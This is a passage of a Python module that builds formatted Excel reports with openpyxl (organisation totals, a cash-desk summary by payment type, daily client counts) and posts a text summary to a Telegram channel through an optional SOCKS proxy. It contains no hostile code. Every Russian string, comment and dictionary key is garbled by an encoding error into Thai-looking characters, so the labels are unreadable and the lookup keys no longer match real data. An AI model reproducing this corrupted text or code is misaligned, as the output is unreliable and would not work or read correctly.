resporse += f'ะัะดะธ (ะฟะปัะถ) - {self.itog_report_org2["ะะตัะฝัั ะทะพะฝะฐ | ะะะะะะะะข | 1 ะฟัะพั
ะพะด"][0]};\n'
except KeyError:
pass
resporse += f'ะัะพะณะพ ะฟะพ ะฟะปัะถั - {self.itog_report_org2["ะัะพะณะพ ะฟะพ ะพััะตัั"][1]:.2f} โฝ;\n'
resporse += f'ะะตะท ะงะ.'
with open(f'reports/{self.date_from.strftime("%Y.%m.%d")}_sms.txt', 'w', encoding='utf-8') as f:
f.write(resporse)
return resporse
def send_message_to_telegram(self):
"""
ะัะฟัะฐะฒะบะฐ ะพััะตัะฐ ะฒ telegram
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะฟัะฐะฒะบะฐ SMS-ะพััะตัะฐ ะฒ Telegram-ะบะฐะฝะฐะป...')
if self.telegram_proxy_use:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพะตะดะธะฝะตะฝะธะต ั ะฟัะพะบัะธ-ัะตัะฒะตัะพะผ {self.telegram_proxy_ip}...')
if self.telegram_proxy_auth:
socks.setdefaultproxy(proxy_type=getattr(socks, self.telegram_proxy_type),
addr=self.telegram_proxy_ip,
port=int(self.telegram_proxy_port),
rdns=True,
username=self.telegram_proxy_username,
password=self.telegram_proxy_password,
)
else:
socks.setdefaultproxy(proxy_type=getattr(socks, self.telegram_proxy_type),
addr=self.telegram_proxy_ip,
port=int(self.telegram_proxy_port),
)
socket.socket = socks.socksocket
bot = telepot.Bot(self.telegram_token)
for line in self.sms_report_list:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะัะฟัะฐะฒะบะฐ ัะพะพะฑัะตะฝะธั {self.sms_report_list.index(line) + 1} ะธะท {len(self.sms_report_list)}')
bot.sendMessage(self.telegram_chanel_id, line)
if self.telegram_proxy_use:
logging.info(
f'{__name__}: {str(datetime.now())[:-7]}: ะ ะฐะทัะตะดะธะฝะตะฝะธะต ั ะฟัะพะบัะธ-ัะตัะฒะตัะพะผ {self.telegram_proxy_ip}...')
socks.setdefaultproxy()
socket.socket = socks.socksocket
def save_organisation_total(self, itog_report):
"""
ะกะพั
ัะฐะฝัะตั ะัะพะณะพะฒัะน ะพััะตั ะฒ Excel
"""
organisation_total = {}
for key in itog_report:
organisation_total[itog_report[key][3]] = {}
for key in itog_report:
organisation_total[itog_report[key][3]][itog_report[key][2]] = []
for key in itog_report:
organisation_total[itog_report[key][3]][itog_report[key][2]].append((key, itog_report[key][0], itog_report[key][1]))
# ะพะฟัะตะดะตะปัะตะผ ััะธะปะธ
h1 = Font(name='Times New Roman',
size=18,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
h2 = Font(name='Times New Roman',
size=14,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
h3 = Font(name='Times New Roman',
size=11,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font = Font(name='Times New Roman',
size=9,
bold=False,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font_bold = Font(name='Times New Roman',
size=9,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
fill = PatternFill(fill_type='solid',
start_color='c1c1c1',
end_color='c2c2c2')
align_top = Alignment(horizontal='general',
vertical='top',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0,
)
align_bottom = Alignment(horizontal='general',
vertical='bottom',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0,
)
border = Border(left=Side(border_style='thin',
color='FF000000'),
right=Side(border_style='thin',
color='FF000000'),
top=Side(border_style='thin',
color='FF000000'),
bottom=Side(border_style='thin',
color='FF000000'),
diagonal=Side(border_style='thin',
color='FF000000'),
diagonal_direction=0,
outline=Side(border_style='thin',
color='FF000000'),
vertical=Side(border_style='thin',
color='FF000000'),
horizontal=Side(border_style='thin',
color='FF000000')
)
border_top_bottom = Border(bottom=Side(border_style='thin', color='FF000000'),
top=Side(border_style='thin', color='FF000000'),
)
border_right = Border(right=Side(border_style='thin', color='FF000000'))
border_left = Border(left=Side(border_style='thin', color='FF000000'))
border_top = Border(top=Side(border_style='thin', color='FF000000'))
border_left_top = Border(top=Side(border_style='thin', color='FF000000'),
left=Side(border_style='thin', color='FF000000'),
)
border_right_top = Border(top=Side(border_style='thin', color='FF000000'),
right=Side(border_style='thin', color='FF000000'),
)
align_center = Alignment(horizontal='center',
vertical='bottom',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
align_left = Alignment(horizontal='left',
vertical='bottom',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
number_format = 'General'
protection = Protection(locked=True,
hidden=False)
column = ['', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M']
self.row = '0'
def next_row():
self.row = str(int(self.row) + 1)
return self.row
# ะพะฑัะตะบั
wb = Workbook()
# ะฐะบัะธะฒะฝัะน ะปะธัั
ws = wb.active
# ะฝะฐะทะฒะฐะฝะธะต ัััะฐะฝะธัั
# ws = wb.create_sheet('ะฟะตัะฒะฐั ัััะฐะฝะธัะฐ', 0)
ws.title = 'ะัะพะณะพะฒัะน ะพััะตั'
# ััะธััั
ws['C1'].font = h1
# ะฒััะฐะฒะฝะธะฒะฐะฝะธะต
ws['C1'].alignment = align_left
# ะจะธัะธะฝะฐ ัััะพะปะฑัะพะฒ
ws.column_dimensions['A'].width = 1 / 7 * 8
ws.column_dimensions['B'].width = 1 / 7 * 8
ws.column_dimensions['C'].width = 1 / 7 * 80
ws.column_dimensions['D'].width = 1 / 7 * 8
ws.column_dimensions['E'].width = 1 / 7 * 88
ws.column_dimensions['F'].width = 1 / 7 * 8
ws.column_dimensions['G'].width = 1 / 7 * 24
ws.column_dimensions['H'].width = 1 / 7 * 8
ws.column_dimensions['I'].width = 1 / 7 * 80
ws.column_dimensions['J'].width = 1 / 7 * 8
ws.column_dimensions['K'].width = 1 / 7 * 144
ws.column_dimensions['L'].width = 1 / 7 * 144
ws.column_dimensions['M'].width = 1 / 7 * 8
# ะทะฝะฐัะตะฝะธะต ััะตะนะบะธ
# ws['A1'] = "Hello!"
ws[column[3] + next_row()] = 'ะัะพะณะพะฒัะน ะพััะตั'
ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=12)
ws[column[1] + next_row()] = ''
ws[column[3] + next_row()] = organisation_total['ะัะณะฐะฝะธะทะฐัะธั']['ะัะณะฐะฝะธะทะฐัะธั'][0][0]
ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=12)
ws[column[3] + self.row].font = font
ws[column[3] + self.row].alignment = align_top
ws[column[1] + next_row()] = ''
ws[column[3] + next_row()] = 'ะะฐ ะฟะตัะธะพะด ั:'
ws[column[3] + self.row].font = font
ws[column[3] + self.row].alignment = align_top
ws[column[5] + self.row] = itog_report['ะะฐัะฐ'][0].strftime("%d.%m.%Y")
ws[column[5] + self.row].font = font_bold
ws[column[5] + self.row].alignment = align_top
ws[column[7] + self.row] = 'ะะพ:'
ws[column[7] + self.row].font = font
ws[column[7] + self.row].alignment = align_top
ws[column[9] + self.row] = (itog_report['ะะฐัะฐ'][1] - timedelta(1)).strftime("%d.%m.%Y")
ws[column[9] + self.row].font = font_bold
ws[column[9] + self.row].alignment = align_top
# ะขะะะะะฆะ
def merge_table():
ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=9)
ws.merge_cells(start_row=self.row, start_column=10, end_row=self.row, end_column=11)
ws.merge_cells(start_row=self.row, start_column=12, end_row=self.row, end_column=13)
ws[column[2] + self.row].font = font
ws[column[10] + self.row].font = font
ws[column[12] + self.row].font = font
ws[column[2] + self.row].alignment = align_top
ws[column[10] + self.row].alignment = align_top
ws[column[12] + self.row].alignment = align_top
b = 2
while b <= 13:
ws[column[b] + self.row].border = border
b += 1
def merge_table_h3():
ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=9)
ws.merge_cells(start_row=self.row, start_column=10, end_row=self.row, end_column=11)
ws.merge_cells(start_row=self.row, start_column=12, end_row=self.row, end_column=13)
ws[column[2] + self.row].font = h3
ws[column[10] + self.row].font = h3
ws[column[12] + self.row].font = h3
ws[column[2] + self.row].alignment = align_top
ws[column[10] + self.row].alignment = align_top
ws[column[12] + self.row].alignment = align_top
ws[column[2] + self.row].border = border_left
ws[column[13] + self.row].border = border_right
def merge_table_h2():
ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=9)
ws.merge_cells(start_row=self.row, start_column=10, end_row=self.row, end_column=11)
ws.merge_cells(start_row=self.row, start_column=12, end_row=self.row, end_column=13)
ws[column[2] + self.row].font = h2
ws[column[10] + self.row].font = h2
ws[column[12] + self.row].font = h2
ws[column[2] + self.row].alignment = align_top
ws[column[10] + self.row].alignment = align_top
ws[column[12] + self.row].alignment = align_top
ws[column[2] + self.row].border = border_left
ws[column[13] + self.row].border = border_right
def merge_width_h2():
ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=13)
ws[column[2] + self.row].font = h2
ws[column[2] + self.row].alignment = align_top
b = 2
while b <= 13:
if b == 2:
ws[column[b] + self.row].border = border_left_top
elif b == 13:
ws[column[b] + self.row].border = border_right_top
else:
ws[column[b] + self.row].border = border_top
b += 1
def merge_width_h3():
ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=13)
ws[column[2] + self.row].font = h3
ws[column[2] + self.row].alignment = align_top
b = 2
while b <= 13:
if b == 2:
ws[column[b] + self.row].border = border_left
elif b == 13:
ws[column[b] + self.row].border = border_right
b += 1
ws[column[2] + next_row()] = 'ะะฐะทะฒะฐะฝะธะต'
ws[column[10] + self.row] = 'ะะพะปะธัะตััะฒะพ'
ws[column[12] + self.row] = 'ะกัะผะผะฐ'
merge_table()
ws[column[2] + self.row].font = h3
ws[column[10] + self.row].font = h3
ws[column[12] + self.row].font = h3
ws[column[2] + self.row].alignment = align_top
ws[column[10] + self.row].alignment = align_top
ws[column[12] + self.row].alignment = align_top
groups = [
'ะะตะฟะพะทะธั',
'ะะฐััั',
'ะฃัะปัะณะธ',
'ะขะพะฒะฐัั',
'ะะปะฐัะฝัะต ะทะพะฝั',
]
all_count = 0
all_sum = 0
try:
for gr in groups:
ws[column[2] + next_row()] = gr
merge_width_h2()
group_count = 0
group_sum = 0
organisation_total_groups = organisation_total.get(gr)
if not organisation_total_groups:
continue
for group in organisation_total_groups:
ws[column[2] + next_row()] = group
merge_width_h3()
service_count = 0
service_sum = 0
servises = organisation_total_groups.get(group, [])
if not servises:
continue
for service in servises:
try:
service_count += service[1]
service_sum += service[2]
except TypeError:
pass
ws[column[2] + next_row()] = service[0]
ws[column[10] + self.row] = service[1]
ws[column[12] + self.row] = service[2]
ws[column[12] + self.row].number_format = '#,##0.00 โฝ'
merge_table()
ws[column[10] + next_row()] = service_count
ws[column[12] + self.row] = service_sum
ws[column[12] + self.row].number_format = '#,##0.00 โฝ'
merge_table_h3()
group_count += service_count
group_sum += service_sum
ws[column[10] + next_row()] = group_count
ws[column[12] + self.row] = group_sum
ws[column[12] + self.row].number_format = '#,##0.00 โฝ'
merge_table_h2()
all_count += group_count
all_sum += group_sum
group_count = 0
group_sum = 0
except KeyError:
pass
bars_total_sum = organisation_total["ะัะพะณะพ ะฟะพ ะพััะตัั"][""][0]
if all_sum == bars_total_sum[2]:
ws[column[2] + next_row()] = bars_total_sum[0]
ws[column[10] + self.row] = bars_total_sum[1]
ws[column[12] + self.row] = bars_total_sum[2]
self.total_report_sum = all_sum
else:
error_code = f'ะัะธะฑะบะฐ: ะัะพะณะพะฒัะต ััะผะผั ะฝะต ัะพะฒะฟะฐะดะฐัั.'
error_message = f'"ะัะพะณะพ ะฟะพ ะพััะตัั" ะธะท ะะฐััะฐ ({bars_total_sum[2]})' \
f' ะฝะต ัะพะฒะฟะฐะดะฐะตั ั ะธัะพะณะพะฒะพะน ััะผะผะพะน ะฟะพ ัะพัะผะธััะตะผัะผ ัััะพะบะฐะผ ({all_sum}).'
logging.error(f'{__name__}: {str(datetime.now())[:-7]}: {error_code} {error_message}')
self.show_dialog(error_code, error_message)
return None
ws[column[12] + self.row].number_format = '#,##0.00 โฝ'
merge_table_h2()
ws[column[2] + self.row].alignment = align_bottom
ws[column[10] + self.row].alignment = align_bottom
ws[column[12] + self.row].alignment = align_bottom
b = 2
while b <= 13:
ws[column[b] + self.row].border = border_top_bottom
b += 1
end_line = int(self.row)
# ัะฐัะบัะฒัะธะฒะฐะฝะธะต ัะพะฝะฐ ะดะปั ะทะฐะณะพะปะพะฒะบะพะฒ
i = 2
while i <= 13:
ws[column[i] + '6'].fill = fill
i += 1
# ะพะฑะฒะพะดะบะฐ
# ws['A3'].border = border
# ะฒัััะฝัั ัััะฐะฝะฐะฒะปะธะฒะฐะตะผ ะฒััะพัั ะฟะตัะฒะพะน ัััะพะบะธ
rd = ws.row_dimensions[1]
rd.height = 21.75
# ัะฒะตะปะธัะธะฒะฐะตะผ ะฒัะต ัััะพะบะธ ะฟะพ ะฒััะพัะต
max_row = ws.max_row
i = 2
while i <= max_row:
rd = ws.row_dimensions[i]
rd.height = 18
i += 1
# ะััะพัะฐ ัััะพะบ
ws.row_dimensions[2].height = 5.25
ws.row_dimensions[4].height = 6.75
ws.row_dimensions[end_line].height = 30.75
# ะฒััะฐะฒะฝะธะฒะฐะฝะธะต ััะพะปะฑัะฐ
for cellObj in ws['A2:A5']:
for cell in cellObj:
ws[cell.coordinate].alignment = align_left
# ะฟะตัะตััะณะธะฒะฐะฝะธะต ััะตะตะบ
# https://stackoverflow.com/questions/13197574/openpyxl-adjust-column-width-size
# dims = {}
# for row in ws.rows:
# for cell in row:
# if cell.value:
# dims[cell.column] = max((dims.get(cell.column, 0), len(cell.value)))
# for col, value in dims.items():
# # value * ะบะพััะธัะธะตะฝั
# ws.column_dimensions[col].width = value * 1.5
# ัะพั
ัะฐะฝะตะฝะธะต ัะฐะนะปะฐ ะฒ ัะตะบัััั ะดะธัะตะบัะพัะธั
if itog_report['ะะฐัะฐ'][0] == itog_report["ะะฐัะฐ"][1] - timedelta(1):
date_ = datetime.strftime(itog_report["ะะฐัะฐ"][0], "%Y-%m-%d")
else:
date_ = f'{datetime.strftime(itog_report["ะะฐัะฐ"][0], "%Y-%m-%d")} - ' \
f'{datetime.strftime(itog_report["ะะฐัะฐ"][1] - timedelta(1), "%Y-%m-%d")}'
path = self.local_folder + self.path + date_ + \
f' ะัะพะณะพะฒัะน ะพััะตั ะฟะพ {organisation_total["ะัะณะฐะฝะธะทะฐัะธั"]["ะัะณะฐะฝะธะทะฐัะธั"][0][0]} ' + ".xlsx"
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพั
ัะฐะฝะตะฝะธะต ะัะพะณะพะฒะพะณะพ ะพััะตัะฐ '
f'ะฟะพ {organisation_total["ะัะณะฐะฝะธะทะฐัะธั"]["ะัะณะฐะฝะธะทะฐัะธั"][0][0]} ะฒ {path}')
path = self.create_path(path)
self.save_file(path, wb)
return path
def save_cashdesk_report(self, cashdesk_report):
"""
ะกะพั
ัะฐะฝัะตั ะกัะผะผะพะฒะพะน ะพััะตั ะฒ Excel
"""
# ะพะฟัะตะดะตะปัะตะผ ััะธะปะธ
h1 = Font(name='Times New Roman',
size=18,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
h2 = Font(name='Times New Roman',
size=14,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
h3 = Font(name='Times New Roman',
size=10,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font = Font(name='Times New Roman',
size=9,
bold=False,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font_bold = Font(name='Times New Roman',
size=9,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font_red = Font(name='Times New Roman',
size=9,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FFFF0000')
fill = PatternFill(fill_type='solid',
start_color='c1c1c1',
end_color='c2c2c2')
align_top = Alignment(horizontal='general',
vertical='top',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0,
)
align_bottom = Alignment(horizontal='general',
vertical='bottom',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0,
)
border = Border(left=Side(border_style='thin',
color='FF000000'),
right=Side(border_style='thin',
color='FF000000'),
top=Side(border_style='thin',
color='FF000000'),
bottom=Side(border_style='thin',
color='FF000000'),
diagonal=Side(border_style='thin',
color='FF000000'),
diagonal_direction=0,
outline=Side(border_style='thin',
color='FF000000'),
vertical=Side(border_style='thin',
color='FF000000'),
horizontal=Side(border_style='thin',
color='FF000000')
)
border_top_bottom = Border(bottom=Side(border_style='thin', color='FF000000'),
top=Side(border_style='thin', color='FF000000'),
)
border_right = Border(right=Side(border_style='thin', color='FF000000'))
border_left = Border(left=Side(border_style='thin', color='FF000000'))
border_top = Border(top=Side(border_style='thin', color='FF000000'))
border_left_top = Border(top=Side(border_style='thin', color='FF000000'),
left=Side(border_style='thin', color='FF000000'),
)
border_right_top = Border(top=Side(border_style='thin', color='FF000000'),
right=Side(border_style='thin', color='FF000000'),
)
align_center = Alignment(horizontal='center',
vertical='bottom',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
align_left = Alignment(horizontal='left',
vertical='bottom',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
number_format = 'General'
protection = Protection(locked=True,
hidden=False)
column = ['', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']
self.row = '0'
def next_row():
self.row = str(int(self.row) + 1)
return self.row
# ะพะฑัะตะบั
wb = Workbook()
# ะฐะบัะธะฒะฝัะน ะปะธัั
ws = wb.active
# ะฝะฐะทะฒะฐะฝะธะต ัััะฐะฝะธัั
# ws = wb.create_sheet('ะฟะตัะฒะฐั ัััะฐะฝะธัะฐ', 0)
ws.title = 'ะกัะผะผะพะฒะพะน ะพััะตั ะฟะพ ัะตะบะพะฒะพะน ะปะตะฝัะต'
# ััะธััั
ws['A1'].font = h1
# ะฒััะฐะฒะฝะธะฒะฐะฝะธะต
ws['A1'].alignment = align_left
# ะจะธัะธะฝะฐ ัััะพะปะฑัะพะฒ
ws.column_dimensions['A'].width = 1 / 7 * 124
ws.column_dimensions['B'].width = 1 / 7 * 88
ws.column_dimensions['C'].width = 1 / 7 * 28
ws.column_dimensions['D'].width = 1 / 7 * 24
ws.column_dimensions['E'].width = 1 / 7 * 32
ws.column_dimensions['F'].width = 1 / 7 * 1
ws.column_dimensions['G'].width = 1 / 7 * 79
ws.column_dimensions['H'].width = 1 / 7 * 3
ws.column_dimensions['I'].width = 1 / 7 * 5
ws.column_dimensions['J'].width = 1 / 7 * 96
ws.column_dimensions['K'].width = 1 / 7 * 88
ws.column_dimensions['L'].width = 1 / 7 * 8
ws.column_dimensions['M'].width = 1 / 7 * 80
ws.column_dimensions['N'].width = 1 / 7 * 96
# ะทะฝะฐัะตะฝะธะต ััะตะนะบะธ
# ws['A1'] = "Hello!"
ws[column[1] + next_row()] = 'ะกัะผะผะพะฒะพะน ะพััะตั ะฟะพ ัะตะบะพะฒะพะน ะปะตะฝัะต'
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column)-1)
# ััะธััั
ws[column[1] + self.row].font = h1
# ะฒััะฐะฒะฝะธะฒะฐะฝะธะต
ws[column[1] + self.row].alignment = align_left
# ะััะพัะฐ ัััะพะบ
ws.row_dimensions[1].height = 24
ws[column[1] + next_row()] = f'{cashdesk_report["ะัะณะฐะฝะธะทะฐัะธั"][0][0]}'
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column) - 1)
ws[column[1] + self.row].font = font
ws[column[1] + self.row].alignment = align_top
ws[column[1] + next_row()] = 'ะะฐ ะฟะตัะธะพะด ั:'
ws[column[1] + self.row].font = font
ws[column[1] + self.row].alignment = align_top
ws[column[2] + self.row] = cashdesk_report['ะะฐัะฐ'][0][0].strftime("%d.%m.%Y")
ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=3)
ws[column[2] + self.row].font = font_bold
ws[column[2] + self.row].alignment = align_top
ws[column[4] + self.row] = 'ะฟะพ'
ws[column[4] + self.row].font = font
ws[column[4] + self.row].alignment = align_top
ws[column[5] + self.row] = (cashdesk_report['ะะฐัะฐ'][0][1] - timedelta(1)).strftime("%d.%m.%Y")
ws.merge_cells(start_row=self.row, start_column=5, end_row=self.row, end_column=7)
ws[column[5] + self.row].font = font_bold
ws[column[5] + self.row].alignment = align_top
# ะขะะะะะฆะ
def merge_table():
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=2)
ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=6)
ws.merge_cells(start_row=self.row, start_column=7, end_row=self.row, end_column=9)
ws.merge_cells(start_row=self.row, start_column=11, end_row=self.row, end_column=12)
ws[column[1] + self.row].font = font
ws[column[3] + self.row].font = font
ws[column[7] + self.row].font = font
ws[column[10] + self.row].font = font
ws[column[11] + self.row].font = font
ws[column[13] + self.row].font = font
ws[column[14] + self.row].font = font
ws[column[1] + self.row].alignment = align_top
ws[column[3] + self.row].alignment = align_top
ws[column[7] + self.row].alignment = align_top
ws[column[10] + self.row].alignment = align_top
ws[column[11] + self.row].alignment = align_top
ws[column[13] + self.row].alignment = align_top
ws[column[14] + self.row].alignment = align_top
ws[column[3] + self.row].number_format = '#,##0.00 โฝ'
ws[column[7] + self.row].number_format = '#,##0.00 โฝ'
ws[column[10] + self.row].number_format = '#,##0.00 โฝ'
ws[column[11] + self.row].number_format = '#,##0.00 โฝ'
ws[column[13] + self.row].number_format = '#,##0.00 โฝ'
ws[column[14] + self.row].number_format = '#,##0.00 โฝ'
b = 1
while b < len(column):
ws[column[b] + self.row].border = border
b += 1
def merge_table_h3():
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=2)
ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=6)
ws.merge_cells(start_row=self.row, start_column=7, end_row=self.row, end_column=9)
ws.merge_cells(start_row=self.row, start_column=11, end_row=self.row, end_column=12)
ws[column[1] + self.row].font = h3
ws[column[3] + self.row].font = h3
ws[column[7] + self.row].font = h3
ws[column[10] + self.row].font = h3
ws[column[11] + self.row].font = h3
ws[column[13] + self.row].font = h3
ws[column[14] + self.row].font = h3
ws[column[1] + self.row].alignment = align_top
ws[column[3] + self.row].alignment = align_top
ws[column[7] + self.row].alignment = align_top
ws[column[10] + self.row].alignment = align_top
ws[column[11] + self.row].alignment = align_top
ws[column[13] + self.row].alignment = align_top
ws[column[14] + self.row].alignment = align_top
ws[column[3] + self.row].number_format = '#,##0.00 โฝ'
ws[column[7] + self.row].number_format = '#,##0.00 โฝ'
ws[column[10] + self.row].number_format = '#,##0.00 โฝ'
ws[column[11] + self.row].number_format = '#,##0.00 โฝ'
ws[column[13] + self.row].number_format = '#,##0.00 โฝ'
ws[column[14] + self.row].number_format = '#,##0.00 โฝ'
b = 1
while b < len(column):
ws[column[b] + self.row].border = border
b += 1
def merge_table_red():
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=2)
ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=6)
ws.merge_cells(start_row=self.row, start_column=7, end_row=self.row, end_column=9)
ws.merge_cells(start_row=self.row, start_column=11, end_row=self.row, end_column=12)
ws[column[1] + self.row].font = font_red
ws[column[3] + self.row].font = font_red
ws[column[7] + self.row].font = font_red
ws[column[10] + self.row].font = font_red
ws[column[11] + self.row].font = font_red
ws[column[13] + self.row].font = font_red
ws[column[14] + self.row].font = font_red
ws[column[1] + self.row].alignment = align_top
ws[column[3] + self.row].alignment = align_top
ws[column[7] + self.row].alignment = align_top
ws[column[10] + self.row].alignment = align_top
ws[column[11] + self.row].alignment = align_top
ws[column[13] + self.row].alignment = align_top
ws[column[14] + self.row].alignment = align_top
ws[column[3] + self.row].number_format = '#,##0.00 โฝ'
ws[column[7] + self.row].number_format = '#,##0.00 โฝ'
ws[column[10] + self.row].number_format = '#,##0.00 โฝ'
ws[column[11] + self.row].number_format = '#,##0.00 โฝ'
ws[column[13] + self.row].number_format = '#,##0.00 โฝ'
ws[column[14] + self.row].number_format = '#,##0.00 โฝ'
b = 1
while b < len(column):
ws[column[b] + self.row].border = border
b += 1
def merge_width_red():
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column) - 1)
ws[column[1] + self.row].font = font_red
ws[column[1] + self.row].alignment = align_top
b = 1
while b < len(column):
if b == 1:
ws[column[b] + self.row].border = border_left
elif b == len(column) - 1:
ws[column[b] + self.row].border = border_right
else:
ws[column[b] + self.row].border = border
b += 1
ws[column[1] + next_row()] = 'ะะฐััะฐ โ'
ws[column[3] + self.row] = 'ะกัะผะผะฐ'
ws[column[7] + self.row] = 'ะะฐะปะธัะฝัะผะธ'
ws[column[10] + self.row] = 'ะะตะทะฝะฐะปะธัะฝัะผะธ'
ws[column[11] + self.row] = 'ะกะพ ััะตัะฐ'
ws[column[13] + self.row] = 'ะะพะฝััะฐะผะธ'
ws[column[14] + self.row] = 'LSI'
merge_table_h3()
# ัะฐัะบัะฒัะธะฒะฐะฝะธะต ัะพะฝะฐ ะดะปั ะทะฐะณะพะปะพะฒะบะพะฒ
b = 1
while b < len(column):
ws[column[b] + self.row].fill = fill
b += 1
for typpe in cashdesk_report:
if typpe != 'ะะฐัะฐ' and typpe != 'ะัะณะฐะฝะธะทะฐัะธั':
if typpe != 'ะัะพะณะพ':
ws[column[1] + next_row()] = typpe
merge_width_red()
for line in cashdesk_report[typpe]:
ws[column[1] + next_row()] = line[0]
ws[column[3] + self.row] = line[1]
ws[column[7] + self.row] = line[2]
ws[column[10] + self.row] = line[3]
ws[column[11] + self.row] = line[4]
ws[column[13] + self.row] = line[5]
ws[column[14] + self.row] = line[6]-line[3]
if line[0] == 'ะัะพะณะพ':
merge_table_red()
elif line[0] == 'ะัะพะณะพ ะฟะพ ะพััะตัั':
merge_table_h3()
else:
merge_table()
# ัะฒะตะปะธัะธะฒะฐะตะผ ะฒัะต ัััะพะบะธ ะฟะพ ะฒััะพัะต
max_row = ws.max_row
i = 2
while i <= max_row:
rd = ws.row_dimensions[i]
rd.height = 18
i += 1
if cashdesk_report['ะะฐัะฐ'][0][0] == cashdesk_report["ะะฐัะฐ"][0][1] - timedelta(1):
date_ = datetime.strftime(cashdesk_report["ะะฐัะฐ"][0][0], "%Y-%m-%d")
else:
date_ = f'{datetime.strftime(cashdesk_report["ะะฐัะฐ"][0][0], "%Y-%m-%d")} - ' \
f'{datetime.strftime(cashdesk_report["ะะฐัะฐ"][0][1] - timedelta(1), "%Y-%m-%d")}'
path = self.local_folder + self.path + date_ + f' ะกัะผะผะพะฒะพะน ะพััะตั ะฟะพ {cashdesk_report["ะัะณะฐะฝะธะทะฐัะธั"][0][0]}' + ".xlsx"
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพั
ัะฐะฝะตะฝะธะต ะกัะผะผะพะฒะพะณะพ ะพััะตัะฐ '
f'ะฟะพ {cashdesk_report["ะัะณะฐะฝะธะทะฐัะธั"][0][0]} ะฒ {path}')
path = self.create_path(path)
self.save_file(path, wb)
return path
def save_client_count_totals(self, client_count_totals_org):
"""
ะกะพั
ัะฐะฝัะตั ะพััะตั ะฟะพ ะบะพะปะธัะตััะฒั ะบะปะธะตะฝัะพะฒ ะทะฐ ะดะตะฝั ะฒ Excel
"""
# ะพะฟัะตะดะตะปัะตะผ ััะธะปะธ
h1 = Font(name='Times New Roman',
size=18,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font = Font(name='Times New Roman',
size=9,
bold=False,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font_bold = Font(name='Times New Roman',
size=9,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
fill = PatternFill(fill_type='solid',
start_color='c1c1c1',
end_color='c2c2c2')
align_top = Alignment(horizontal='general',
vertical='top',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0,
)
border = Border(left=Side(border_style='thin',
color='FF000000'),
right=Side(border_style='thin',
color='FF000000'),
top=Side(border_style='thin',
color='FF000000'),
bottom=Side(border_style='thin',
color='FF000000'),
diagonal=Side(border_style='thin',
color='FF000000'),
diagonal_direction=0,
outline=Side(border_style='thin',
color='FF000000'),
vertical=Side(border_style='thin',
color='FF000000'),
horizontal=Side(border_style='thin',
color='FF000000')
)
align_left = Alignment(horizontal='left',
vertical='bottom',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
number_format = 'General'
protection = Protection(locked=True,
hidden=False)
column = ['', 'A', 'B', 'C', 'D', 'E']
self.row = '0'
def next_row():
self.row = str(int(self.row) + 1)
return self.row
# ะพะฑัะตะบั
wb = Workbook()
# ะฐะบัะธะฒะฝัะน ะปะธัั
ws = wb.active
# ะฝะฐะทะฒะฐะฝะธะต ัััะฐะฝะธัั
# ws = wb.create_sheet('ะฟะตัะฒะฐั ัััะฐะฝะธัะฐ', 0)
ws.title = 'ะะพะปะธัะตััะฒะพ ัะตะปะพะฒะตะบ ะทะฐ ะดะตะฝั'
# ััะธััั
ws['A1'].font = h1
# ะฒััะฐะฒะฝะธะฒะฐะฝะธะต
ws['A1'].alignment = align_left
# ะจะธัะธะฝะฐ ัััะพะปะฑัะพะฒ
